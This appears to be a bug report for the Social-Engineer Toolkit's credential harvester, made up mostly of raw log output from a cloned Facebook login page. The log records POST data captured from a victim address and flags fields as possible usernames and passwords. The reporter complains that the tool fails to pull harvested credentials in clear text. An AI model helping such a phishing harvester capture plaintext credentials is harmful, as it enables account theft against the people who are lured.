10.0.0.75 - - [07/Aug/2023 15:34:09] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundarympb3GRaAhN9Uwuhq
Content-Disposition: form-data; name="ts"
[{"app_id":"256281040558","posts":"9wWAW1siZmFsY286b2RzX3dlYl9iYXRjaCIseyJlIjoie1wiBRAkXCI6e1wiMTM0NAkKBTMYLmV2ZW50LgE1VHRpbWVfc3BlbnRfYml0X2FycmF5XCIBNGxqcy51c2VfYmFuemFpLmxvZ19pbW1lZGlhdGVsASMkWzEsbnVsbF0sXAErDScgcG9zdGluZ19lAWEEXCIVJVh9LFwiZmFsY28uZmFicmljLnd3dy5DM/pqAHaWABRwbGFuZXMRmkB3cml0ZV90b190cmFuc3Bvci6fAAnEBbUZKRBxdWV1ZVLEAA0pDGViX3RKPwEu2AANKhF8QlMA9BwBfX19IiwiciI6MSwiZCI6IiRefEFjWVJBM3Z4S3VPVTJPQXRqRGNDbUg2YTJibXVsOV9fVjBFZk5GUW9VdDJkcGhQWEZfYmtVMF9ScEk1bmFFakxXTm5YVTZoei1UR19Oa3ZTUWlER294NTJMMmJKaV81ZEE3WkptU0h2STkyandqSzdxVVhjaG1ZfGZkLkFjYlZGazJlQ3NrNFN1b1JpdXdRa2UzQzZqdWNJekZmVVR6M1V1YnZlLXM2UWhfMGthTjR2Njc1YzQyRXA4YjBiTlpyM25PVjdiVVdiZEJXdGY2Z3UyZ20iLCJzIjoiNjEzYTI2OmwwYzJhejppa3UzYWciLCJ0IjoxNjkxNDQwMzkyMjUzLjQwMDF9LDE2BRQ8NDMyNDM5LjIsMCw3MTFdXQ==","user":"0","webSessionId":"613a26:l0c2az:iku3ag","trigger":"falco:web_time_spent_bit_array","send_method":"ajax","compression":"snappy_base64","snappy_ms":1},{"app_id":"256281040558","posts":[["require_cond_exposure_logging",{"identifier":"Aa05C42JXGTNv8gMy9MiYQN4VT0t74_lXD_RchKm5RiarqFX0CIZKFPSAHZOvCiWwh5nWAaOtiI-xEVtU-uFHV0Y35P-_2U"},1691440491501.4,0,112],["gk2_exposure",{"identifier":"1857581","hash":"AT5yTxGMp6le0PAtfZ4"},1691440491501.4,0,53],["falco:web_time_spent_bit_array",{"e":"{\"sid_raw\":\"613a26:l0c2az:iku3ag\",\"start_time\":1691440427,\"tos_array\":[59,0],\"tos_cum\":13,\"tos_id\":\"iku3ag\",\"tos_len\":64,\"tos_seq\":1}","r":1,"d":"$^|AcYRA3vxKuOU2OAtjDcCmH6a2bmul9__V0EfNFQoUt2dphPXF_bkU0_RpI5naEjLWNnXU6hz-TG_NkvSQiDGox52L2bJi_5dA7ZJmSHvI92jwjK7qUXchmY|fd.AcbVFk2eCsk4SuoRiuwQke3C6jucIzFfUTz3Uubve-s6Qh_0kaN4v675c42Ep8b0bNZr3nOV7bUWbdBWtf6gu2gm","s":":l0c2az:iku3ag","t":1691440451315.9001},1691440491501.4,0,430]],"user":"0","webSessionId":":l0c2az:iku3ag","compression":""}]
------WebKitFormBoundarympb3GRaAhN9Uwuhq--
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:34:52] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264681108549420648&req=6&rev=1007985184&s=%3Al0c2az%3Aiku3ag&spin_b=trunk&__spin_r=1007985184&spin_t=1691440378&user=0&dpr=1&jazoest=2850&lsd=AVo00zASTAI HTTP/1.1" 302 -
[*] WE GOT A HIT! Printing the output:
PARAM: local_storage[Session]=20
PARAM: local_storage[hb_timestamp]=13
PARAM: local_storage[signal_flush_timestamp]=13
PARAM: session_storage[TabId]=6
PARAM: session_storage[sp_pi]=216
PARAM: logtime=0
POSSIBLE USERNAME FIELD FOUND: user=0
PARAM: a=1
PARAM: req=7
PARAM: hs=19576.BP:DEFAULT.2.0..0.0
PARAM: dpr=1
PARAM: ccg=EXCELLENT
PARAM: rev=1007985184
PARAM: s=:l0c2az:iku3ag
PARAM: hsi=7264681108549420648
PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w
PARAM: csr=
PARAM: lsd=AVo00zASTAI
PARAM: jazoest=2850
POSSIBLE PASSWORD FIELD FOUND: __spin_r=1007985184
POSSIBLE PASSWORD FIELD FOUND: spin_b=trunk
POSSIBLE PASSWORD FIELD FOUND: __spin_t=1691440378
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:34:59] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 -
[] WE GOT A HIT! Printing the output:
PARAM: local_storage[Session]=20
PARAM: local_storage[hb_timestamp]=13
PARAM: local_storage[signal_flush_timestamp]=13
PARAM: session_storage[TabId]=6
PARAM: session_storage[sp_pi]=216
PARAM: logtime=0
POSSIBLE USERNAME FIELD FOUND: user=0
PARAM: a=1
PARAM: req=8
PARAM: hs=19576.BP:DEFAULT.2.0..0.0
PARAM: dpr=1
PARAM: ccg=EXCELLENT
PARAM: rev=1007985184
PARAM: s=:l0c2az:iku3ag
PARAM: hsi=7264681108549420648
PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w
PARAM: csr=
PARAM: lsd=AVo00zASTAI
PARAM: jazoest=2850
POSSIBLE PASSWORD FIELD FOUND: spin_r=1007985184
POSSIBLE PASSWORD FIELD FOUND: __spin_b=trunk
POSSIBLE PASSWORD FIELD FOUND: spin_t=1691440378
[] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:34:59] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 -
[] WE GOT A HIT! Printing the output:
PARAM: local_storage[Session]=20
PARAM: local_storage[hb_timestamp]=13
PARAM: local_storage[signal_flush_timestamp]=13
PARAM: session_storage[TabId]=6
PARAM: session_storage[sp_pi]=216
PARAM: logtime=0
POSSIBLE USERNAME FIELD FOUND: user=0
PARAM: a=1
PARAM: req=9
PARAM: hs=19576.BP:DEFAULT.2.0..0.0
PARAM: dpr=1
PARAM: ccg=EXCELLENT
PARAM: rev=1007985184
PARAM: s=:l0c2az:iku3ag
PARAM: hsi=7264681108549420648
PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w
PARAM: csr=
PARAM: lsd=AVo00zASTAI
PARAM: jazoest=2850
POSSIBLE PASSWORD FIELD FOUND: spin_r=1007985184
POSSIBLE PASSWORD FIELD FOUND: __spin_b=trunk
POSSIBLE PASSWORD FIELD FOUND: spin_t=1691440378
[] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
Set Version
Kali GNU/Linux Rolling
Before opening an issue please make sure you are running the most up to date version of set
We see the same bug reports being opened for issues that have already been fixed in a new release
Set in Kali
2023.2
Please make sure you are running kali-rolling and your system is up to date.
To update your system do the following apt update && apt full-upgrade
Run the following to check your version of Kali lsb_release -rdc and you should see the following
output
Description: Kali GNU/Linux Rolling
Release: kali-rolling
Codename: kali-rolling
Expected Behaviour
Pulls the harvested credentials in clear text
Actual Behaviour
Put here what the actual behaviour should be when reporting an issue 10.0.0.75 - - [07/Aug/2023 15:33:10] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264675851242366798&req=5&rev=1007985184&s=%3Anj5dyt%3Achsna6&spin_b=trunk&__spin_r=1007985184&spin_t=1691439154&user=0&dpr=1&jazoest=2926&lsd=AVpW3FMZLeo HTTP/1.1" 302 - [*] WE GOT A HIT! Printing the output: PARAM: local_storage[Session]=20 PARAM: local_storage[hb_timestamp]=13 PARAM: local_storage[signal_flush_timestamp]=13 PARAM: session_storage[TabId]=6 PARAM: session_storage[sp_pi]=216 PARAM: logtime=1 POSSIBLE USERNAME FIELD FOUND: user=0 PARAM: a=1 PARAM: req=6 PARAM: hs=19576.BP:DEFAULT.2.0..0.0 PARAM: dpr=1 PARAM: ccg=EXCELLENT PARAM: rev=1007985184 PARAM: s=:nj5dyt:chsna6 PARAM: hsi=7264675851242366798 PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w PARAM: csr= PARAM: lsd=AVpW3FMZLeo PARAM: jazoest=2926 POSSIBLE PASSWORD FIELD FOUND: __spin_r=1007985184 POSSIBLE PASSWORD FIELD FOUND: spin_b=trunk POSSIBLE PASSWORD FIELD FOUND: __spin_t=1691439154 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:11] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 - [*] WE GOT A HIT! Printing the output: POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundaryDNDBGtYgVYqjx4gQ Content-Disposition: form-data; name="ts"
1691440391512 ------WebKitFormBoundaryDNDBGtYgVYqjx4gQ Content-Disposition: form-data; name="q"
[{"app_id":"256281040558","posts":[["require_cond_exposure_logging",{"identifier":"Aa2GAcT5dIr0ZSQ0uy_eXbcOQiK9YrjaEk2WeLTreERc2kVFCff2fPdBZgzb8TAPIzt9ZG8XaqBrJ7fsWLOD630VuM7I3_Q"},1691440390058.5,0,112],["falco:bd_pdc_signals",{"e":"{\"asid\":\"a6d838ae-5cab-4da8-9b0e-39b7e8b00711\",\"ct\":1659080345,\"sjd\":\"ZShGbIhCekiyL+Z7iR4zlmaIOG5www9EV5/V5acDfs0L1Lw2Zatb0tBCYPNTJp4HCnEnu6sL6VzH9ttkOf4pde4ZEwntFBlj7KORn7NEQYa6PRInyRnjWn8jZbXy4f9WMULoTOPBMp1uvsnederjhg==\",\"sid\":-1}","r":1,"d":"$^|AcYRA3vxKuOU2OAtjDcCmH6a2bmul9V0EfNFQoUt2dphPXF_bkU0_RpI5naEjLWNnXU6hz-TG_NkvSQiDGox52L2bJi_5dA7ZJmSHvI92jwjK7qUXchmY|fd.AcZ2qqh8wgqiig-J2n2As91Li08OgTJgc6k-yCSGd2aSnvz4V5x6m7vieJVnHRc6yyjcl3GxpZUgjuSF1DpMBVCc","s":":nj5dyt:chsna6","t":1691440224482.8},1691440390058.5,1,521],["gk2_exposure",{"identifier":"1857581","hash":"AT5yTxGMp6le0PAt7KM"},1691440390300.6,0,53],["falco:web_time_spent_bit_array",{"e":"{\"sid_raw\":\"5bqbob:nj5dyt:chsna6\",\"start_time\":1691439329,\"tos_array\":[319,0],\"tos_cum\":14,\"tos_id\":\"chsna6\",\"tos_len\":64,\"tos_seq\":1}","r":1,"d":"$^|AcYRA3vxKuOU2OAtjDcCmH6a2bmul9V0EfNFQoUt2dphPXF_bkU0_RpI5naEjLWNnXU6hz-TG_NkvSQiDGox52L2bJi_5dA7ZJmSHvI92jwjK7qUXchmY|fd.AcZ2qqh8wgqiig-J2n2As91Li08OgTJgc6k-yCSGd2aSnvz4V5x6m7vieJVnHRc6yyjcl3GxpZUgjuSF1DpMBVCc","s":":nj5dyt:chsna6","t":1691440224723.3},1691440390300.6,0,428]],"user":"0","webSessionId":":nj5dyt:chsna6","trigger":"falco:ods_web_batch","send_method":"ajax","compression":""}] ------WebKitFormBoundaryDNDBGtYgVYqjx4gQ-- [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:11] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264675851242366798&req=7&rev=1007985184&s=%3Anj5dyt%3Achsna6&spin_b=trunk&__spin_r=1007985184&spin_t=1691439154&__user=0&dpr=1&jazoest=2926&lsd=AVpW3FMZLeo HTTP/1.1" 302 - [*] WE GOT A HIT! Printing the output: POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundarytbSkjbAyPJWR8pCM Content-Disposition: form-data; name="ts"
1691440389996 ------WebKitFormBoundarytbSkjbAyPJWR8pCM Content-Disposition: form-data; name="q"
[{"app_id":"256281040558","posts":"swrwaVtbImZhbGNvOmJkX3BkY19zaWduYWxzIix7ImUiOiJ7XCJhc2lkXCI6XCJhNmQ4MzhhZS01Y2FiLTRkYTgtOWIwZS0zOWI3ZThiMDA3MTFcIixcImN0XCI6MTY1OTA4MDM0NSxcInNqZFwBQ/TRAVpTaEdiSWhDZWtpeUwrWjdpUjR6bHNFTmZNVjhNV3hxck1RMUZkakMwV2tXS1JpaEhST0dpVHYwK1BBOFZqem81b3Y2dy92dDdjQkVjMDdKL2NHZXdPZzc3L1laOUFhbC8zeklRdElPNjVMU09iT3dZMXNLa0xZZjg3Z3hCeEdOcU9LRld2NVNabXZsNEYzWXNmMlBCQT09XCIsXCJzaWRcIjotMX0iLCJyIjoxLCJkIjoiJF58QWNZUkEzdnhLdU9VMk9BdGpEY0NtSDZhMmJtdWw5X19WMEVmTkZRb1V0MmRwaFBYRl9ia1UwX1JwSTVuYUVqTFdOblhVNmh6LVRHX05rdlNRaURHb3g1MkwyYkppXzVkQTdaSm1TSHZJOTJqd2pLN3FVWGNobVl8ZmQuQWNaMnFxaDh3Z3FpaWctSjJuMkFzOTFMaTA4T2dUSmdjNmsteUNTR2QyYVNudno0VjV4Nm03dmllSlZuSFJjNnl5amNsM0d4cFpVZ2p1U0YxRHBNQlZDYyIsInMiOiI1YnFib2I6bmo1ZHl0OmNoc25hNiIsInQiOjE2OTE0MzkxNTQ4NTAuMX0sMTY5MTQzOTMyMDQ3My4yLDMsNTI3XSxRPzBvZHNfd2ViX2JhdGNoXT4FECRcIjp7XCIxMzQ0CQosZmFsY28uZXZlbnQuATVQdGltZV9zcGVudF9iaXRfYXJyYXlcBTRsanMudXNlX2JhbnphaS5sb2dfaW1tZWRpYXRlbAEjJFsxLG51bGxdLFwBKw0nHHBvc3RpbmdfBWEEXCIVJQx9LFwiCXswZmFicmljLnd3dy5DM/pqAHaWABRwbGFuZXMRmkB3cml0ZV90b190cmFuc3Bvci6fAAnEBbUZKRBxdWV1ZVLEAA0pDGViX3RKPwEu2AANKhF8QlMACH19ff7zAv7zAv7zAv7zAi7zAhg2NzkwNS43WfM4MzM0ODEuNywwLDcwOF1d","user":"0","webSessionId":"5bqbob:nj5dyt:chsna6","send_method":"beacon","compression":"snappy_base64","snappy_ms":2}] ------WebKitFormBoundarytbSkjbAyPJWR8pCM-- [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:11] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264675851242366798&req=4&rev=1007985184&s=%3Anj5dyt%3Achsna6&spin_b=trunk&__spin_r=1007985184&spin_t=1691439154&user=0&dpr=1&jazoest=2926&lsd=AVpW3FMZLeo HTTP/1.1" 302 - [*] WE GOT A HIT! Printing the output: PARAM: local_storage[Session]=20 PARAM: local_storage[hb_timestamp]=13 PARAM: local_storage[signal_flush_timestamp]=13 PARAM: session_storage[TabId]=6 PARAM: session_storage[sp_pi]=216 PARAM: logtime=1 POSSIBLE USERNAME FIELD FOUND: user=0 PARAM: a=1 PARAM: req=8 PARAM: hs=19576.BP:DEFAULT.2.0..0.0 PARAM: dpr=1 PARAM: ccg=EXCELLENT PARAM: rev=1007985184 PARAM: s=:nj5dyt:chsna6 PARAM: hsi=7264675851242366798 PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w PARAM: csr= PARAM: lsd=AVpW3FMZLeo PARAM: jazoest=2926 POSSIBLE PASSWORD FIELD FOUND: __spin_r=1007985184 POSSIBLE PASSWORD FIELD FOUND: spin_b=trunk POSSIBLE PASSWORD FIELD FOUND: __spin_t=1691439154 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:12] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 - [] WE GOT A HIT! Printing the output: PARAM: local_storage[Session]=20 PARAM: local_storage[hb_timestamp]=13 PARAM: local_storage[signal_flush_timestamp]=13 PARAM: session_storage[TabId]=6 PARAM: session_storage[sp_pi]=216 PARAM: logtime=1 POSSIBLE USERNAME FIELD FOUND: user=0 PARAM: a=1 PARAM: req=9 PARAM: hs=19576.BP:DEFAULT.2.0..0.0 PARAM: dpr=1 PARAM: ccg=EXCELLENT PARAM: rev=1007985184 PARAM: s=:nj5dyt:chsna6 PARAM: hsi=7264675851242366798 PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w PARAM: csr= PARAM: lsd=AVpW3FMZLeo PARAM: jazoest=2926 POSSIBLE PASSWORD FIELD FOUND: spin_r=1007985184 POSSIBLE PASSWORD FIELD FOUND: __spin_b=trunk POSSIBLE PASSWORD FIELD FOUND: spin_t=1691439154 [] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:12] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 - [*] WE GOT A HIT! Printing the output: POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundarybO4dSog6yA0G4WlJ Content-Disposition: form-data; name="ts"
1691440410023 ------WebKitFormBoundarybO4dSog6yA0G4WlJ Content-Disposition: form-data; name="q"
[{"app_id":"256281040558","posts":[["falco:bd_pdc_signals",{"e":"{\"asid\":\"a6d838ae-5cab-4da8-9b0e-39b7e8b00711\",\"ct\":1659080345,\"sjd\":\"ZShGbIhCekiyL+Z7iR4zlmaIOG5www9EV5/V5acDfs0L1Lw2Zatb0tBCYPNTJp4HCnEnu6sL6VzH9ttkOf4pde4ZEwntFBlj7KORn7NEQYa6PRInyRnjWn8jZbXy4f9WMULoTOPBMp1uvsnederjhg==\",\"sid\":-1}","r":1,"d":"$^|AcYRA3vxKuOU2OAtjDcCmH6a2bmul9__V0EfNFQoUt2dphPXF_bkU0_RpI5naEjLWNnXU6hz-TG_NkvSQiDGox52L2bJi_5dA7ZJmSHvI92jwjK7qUXchmY|fd.AcZ2qqh8wgqiig-J2n2As91Li08OgTJgc6k-yCSGd2aSnvz4V5x6m7vieJVnHRc6yyjcl3GxpZUgjuSF1DpMBVCc","s":":nj5dyt:chsna6","t":1691440224482.8},1691440390058.5,2,521]],"user":"0","webSessionId":":nj5dyt:chsna6","send_method":"beacon","compression":""},{"app_id":"256281040558","posts":"/AeAW1siZmFsY286b2RzX3dlYl9iYXRjaCIseyJlIjoie1wiBRAkXCI6e1wiMTM0NAkKBTNQLmV2ZW50LmJkX3BkY19zaWduYWxzCSCYanMudXNlX2JhbnphaS5sb2dfY3JpdGljYWxcIjpbMSxudWxsXSxcASgNJCBwb3N0aW5nX2UBVB0lCH0sXA1uMGZhYnJpYy53d3cuQzPuZwBqkAAUcGxhbmVzEZRAd3JpdGVfdG9fdHJhbnNwb3IFmQAyLr4ABa8ZKRBxdWV1ZQG+MiUAOgsBKGltbWVkaWF0ZWx5ASteDgEFp1YsADkVCYAEYmQugwEuHwEJIBXJFaAAMQnFPkkAQQFIdGltZV9zcGVudF9iaXRfYXJyYQGoCHtcIkbWAVafALrZAQ2kBGViUnsArs4A9C4BfX19IiwiciI6MSwiZCI6IiRefEFjWVJBM3Z4S3VPVTJPQXRqRGNDbUg2YTJibXVsOV9fVjBFZk5GUW9VdDJkcGhQWEZfYmtVMF9ScEk1bmFFakxXTm5YVTZoei1UR19Oa3ZTUWlER294NTJMMmJKaV81ZEE3WkptU0h2STkyandqSzdxVVhjaG1ZfGZkLkFjWjJxcWg4d2dxaWlnLUoybjJBczkxTGkwOE9nVEpnYzZrLXlDU0dkMmFTbnZ6NFY1eDZtN3ZpZUpWbkhSYzZ5eWpjbDNHeHBaVWdqdVNGMURwTUJWQ2MiLCJzIjoiNjEzYTI2Om5qNWR5dDpjaHNuYTYiLCJ0IjoxNjkxNDQwMjI5ODM5Ljd9LDE2OTE0NDAzOTU0MTUuMSwwLDk3Ml1d","user":"0","webSessionId":"613a26:nj5dyt:chsna6","compression":"snappy_base64","snappy_ms":1}] ------WebKitFormBoundarybO4dSog6yA0G4WlJ-- [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:30] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264675851242366798&req=a&rev=1007985184&s=613a26%3Anj5dyt%3Achsna6&spin_b=trunk&__spin_r=1007985184&spin_t=1691439154&__user=0&dpr=1&jazoest=2926&lsd=AVpW3FMZLeo HTTP/1.1" 302 - [*] WE GOT A HIT! Printing the output: POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundaryxRBtH0BF8mNjPkJ3 Content-Disposition: form-data; name="ts"
1691440410031 ------WebKitFormBoundaryxRBtH0BF8mNjPkJ3 Content-Disposition: form-data; name="q"
[{"app_id":"256281040558","posts":"ignwVltbImZhbGNvOndlYl90aW1lX3NwZW50X2JpdF9hcnJheSIseyJlIjoie1wic2lkX3Jhd1wiOlwiNjEzYTI2Om5qNWR5dDpjaHNuYTZcIixcInN0YXJ0XwFKSFwiOjE2OTE0NDAzOTQsXCJ0b3MJUyxcIjpbMjg2NzMsMF0NGAhjdW0BLwA4DQ8caWRcIjpcImMZVwE9CGxlbgElADcNJfDwc2VxXCI6Mn0iLCJyIjoxLCJkIjoiJF58QWNZUkEzdnhLdU9VMk9BdGpEY0NtSDZhMmJtdWw5X19WMEVmTkZRb1V0MmRwaFBYRl9ia1UwX1JwSTVuYUVqTFdOblhVNmh6LVRHX05rdlNRaURHb3g1MkwyYkppXzVkQTdaSm1TSHZJOTJqd2pLN3FVWGNobVl8ZmQuQWNaMnFxaDh3Z3FpaWctSjJuMkFzOTFMaTA4T2dUSmdjNmsteUNTR2QyYVNudno0VjV4Nm03dmllSlZuSFJjNnl5amNsM0d4cFpVZ2p1U0YxRHBNQlZDYyIsInMiOlJ1AQwiLCJ0NWkwMjQ0NDY3LjQwMDF9LC19PDQxMDA0My4xLDAsNDM5XSwu8QEMYmx1ZS72ASRuYXZpZ2F0aW9uPfcganNvbl9kYXRhJZQ8e1xcXCJzb3VyY2VfcGF0aAEPADoBBUhYV2ViTG9naW5Db250cm9sbGVyARcALAEFDTAQdG9rZW4BEAUxHDk2ZTg4YWYzAREFJgxkZXN0GVQMbnVsbBkXGTsVGBBjYXVzZQE9BU4UdW5sb2FkAQ8FNQBzTawEXFwJHwg2MTNGsAIEXFwNLQnPFGVmX3BhZwlTFWYNHAh1cmkBLwVrZGh0dHBzOi8vd3d3LmZhY2Vib29rLmNvbS9sAf8MLnBocAErCH1cIv6bAv6bAv6bAv6bAkKbAgg5LjI2mAIoNC42LDAsNjAwXV0=","user":"0","webSessionId":"613a26:nj5dyt:chsna6","send_method":"beacon","compression":"snappy_base64","snappy_ms":1}] ------WebKitFormBoundaryxRBtH0BF8mNjPkJ3-- [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:30] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264675851242366798&req=b&rev=1007985184&s=613a26%3Anj5dyt%3Achsna6&spin_b=trunk&__spin_r=1007985184&spin_t=1691439154&__user=0&dpr=1&jazoest=2926&lsd=AVpW3FMZLeo HTTP/1.1" 302 - 10.0.0.75 - - [07/Aug/2023 15:33:38] "GET / HTTP/1.1" 200 - [*] WE GOT A HIT! Printing the output: POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundarykqBGcHbAys4y1CnE Content-Disposition: form-data; name="ts"
1691440420428 ------WebKitFormBoundarykqBGcHbAys4y1CnE Content-Disposition: form-data; name="q"
[{"app_id":"256281040558","posts":"+RLwoltbInJlcXVpcmVfY29uZF9leHBvc3VyZV9sb2dnaW5nIix7ImlkZW50aWZpZXIiOiJBYTNSbkpTc1NxaHJSUkJsMVVjdW5Cc3Z3QktOSWdxNVE4U1d5V1RWbkMwbVpBUTJnV21Cc01rUkFKaUdYbWFiMDdpV0Jta1hHb2o3X2ZJdFhELXZpcjgifSwxNjkxNDQwNDE5NDIwLjYsMCwxMDRdLFvCoQDwWDJQenU4QkhuTmlEbHZ3UGFicV9GcVNNU0Zta1NEUWFHZFhCNDVZQ1lQeW5yelhTMnZXcnpENXJtWDBUaGhsMElqMUJ4SE9mb3RYVjAxaTh5dWtHSlVuM1RNOqUACDEuMQWlADgBpQhnazI1PUI1AZgxMDczNTAwIiwiaGFzaCI6IkFUN2FKbWZucVd5aW94T09TUnMifSwuAgEJXQQ1MwFcvqIB8FQwODlPNW5mOHE5aVRFNldLeTQwNHRDNVB0WUVtOERaRURvdmI3UkZoem1uZmlFcG9CUU1GLTBESU11UFdrdmJUY0xTclpkenpwUHo2WTNOdlFwOWNzQv0AADIF/QA0AaFy/QAUNzA4MjUzLvwAQDVuNGhCTDNZVE1uUVd0Y3IwUlwABDUyglsAFDY3NjgzNy5bADw0Tjh3QlpBOGN0Q2RId1hPblsAvlcB8Fwzby05anpqSWNGVXBQbVk1QkZqV01NaDhnSUNVQ3dWbnlQNE9GTVh5azBwNVl4b0JTSzZvLUJmYkV3SWZwZEctNnQ2WmZ0dldMSEwyWWNka09FdlgwVmpZbUtWZyI+/gEAMyFeBDExggMBGDEwOTk4OTMuBAFANWtseTJMU1pWX0RLR1JMMUFCXwEBXdZbAvBYMTNUZXV4bHFjOXFkdlpDZlJkVFNmRnZ1R3Utckt1ZE1mbE9MeGZ6UVFFZXhBek9yNURyTnZtcjFTckliQmJoMGVfdnU3cFVUdFhkR3Z2ckdMQzA5Q19SbTRCpAAANCEBaVzwVmZhbGNvOndlYl9ibHVlX3RpbWVfc3BlbnRfbmF2aWdhdGlvbiIseyJlIjoie1wianNvbl9kYXRhXCI6XCJ7XFxcInNvdXJjZV9wYXRoXFxcIjpudWxsLAEKAHMJGRB0b2tlbgEQGRoQZGVzdF8VMQEcSFhXZWJMb2dpbkNvbnRyb2xsZXIBFwAsAQUFLhlGARMcOTZlODhhZjMBDAUkMGltcHJlc3Npb25faWQBFgUnQDFvM29TU2JxVEJTdnJzQkdZARoFMBBjYXVzZQEOBSgIbG9hBTUFGxhzaWRfcmF3FR1MNjEzYTI2OmwwYzJhejppa3UzYWcBHQUtFHJlZmVycgmtBUsVGgW2FGVmX3BhZwlpAG4xGAUaCHVyaQErBTRkaHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL2whEgwucGhwASvw7H1cIn0iLCJyIjoxLCJkIjoiJF58QWNZUkEzdnhLdU9VMk9BdGpEY0NtSDZhMmJtdWw5X19WMEVmTkZRb1V0MmRwaFBYRl9ia1UwX1JwSTVuYUVqTFdOblhVNmh6LVRHX05rdlNRaURHb3g1MkwyYkppXzVkQTdaSm1TSHZJOTJqd2pLN3FVWGNobVl8ZmQuQWNiVkZrMmVDc2s0U3VvUml1d1FrZTNDNmp1Y0l6RmZVVHozVXVidmUtczZRaF8wa2FONHY2NzVjNDJFcDhiMGJOWnIzbk9WN2JVV2JkQld0ZjZndTJnbSIsInMiOlJ2ARQiLC